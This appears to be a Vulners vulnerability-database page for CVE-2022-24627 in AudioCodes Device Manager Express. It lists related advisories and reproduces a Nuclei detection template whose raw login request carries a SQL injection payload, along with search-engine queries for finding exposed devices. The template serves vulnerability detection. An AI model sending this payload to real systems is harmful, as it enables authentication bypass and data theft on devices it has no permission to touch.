| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| Device Manager Express 7.8.20002.47752 SQL Injection / XSS / Code Execution / Traversal | 27 Feb 202300:00 | – | zdt | |
| CVE-2022-24627 | 29 May 202321:15 | – | attackerkb | |
| CVE-2022-24627 | 30 May 202300:36 | – | circl | |
| AudioCodes Device Manager Express SQL注入漏洞 | 24 Feb 202300:00 | – | cnnvd | |
| CVE-2022-24627 | 29 May 202300:00 | – | cve | |
| CVE-2022-24627 | 29 May 202300:00 | – | cvelist | |
| Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE) | 30 Mar 202300:00 | – | exploitdb | |
| CVE-2022-24627 | 29 May 202321:15 | – | nvd | |
| CVE-2022-24627 | 29 May 202321:15 | – | osv | |
| Device Manager Express 7.8.20002.47752 SQL Injection / XSS / Code Execution / Traversal | 23 Feb 202300:00 | – | packetstorm |
id: CVE-2022-24627
info:
name: AudioCodes Device Manager Express - SQL Injection
author: geeknik
severity: critical
description: |
An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form.
impact: |
Unauthenticated attackers can exploit SQL injection in the login form to bypass authentication, extract sensitive VoIP configuration data, and potentially gain administrative access to the AudioCodes Device Manager system.
remediation: |
Update AudioCodes Device Manager Express to a version newer than 7.8.20002.47752 that uses parameterized queries and properly validates input.
reference:
- https://seclists.org/fulldisclosure/2023/Feb/12
- https://nvd.nist.gov/vuln/detail/CVE-2022-24627
- https://github.com/tr3ss/newclei
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-24627
cwe-id: CWE-89
epss-score: 0.26389
epss-percentile: 0.97757
cpe: cpe:2.3:a:audiocodes:device_manager_express:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: audiocodes
product: device_manager_express
shodan-query:
- title:"Audiocodes"
- http.title:"audiocodes"
fofa-query: title="audiocodes"
google-query: intitle:"audiocodes"
tags: cve,cve2022,seclists,sqli,audiocodes,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "audiocodes</title>")'
internal: true
- raw:
- |
POST /admin/AudioCodes_files/process_login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&password=&domain=&p=%5C%27or+1%3D1%23
matchers:
- type: word
part: body
words:
- "SQL syntax"
- "mysql_fetch"
- "You have an error in your SQL syntax"
condition: or
# digest: 4a0a0047304502206d2ae4ae79c51d6e33ef217b93a98130432de895a97ca4bf73fd5ddf6dd9725b022100afd4ac64d1d5306c7f3117051a13313d969ddc04bd28c89fe2885240d64ee910:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation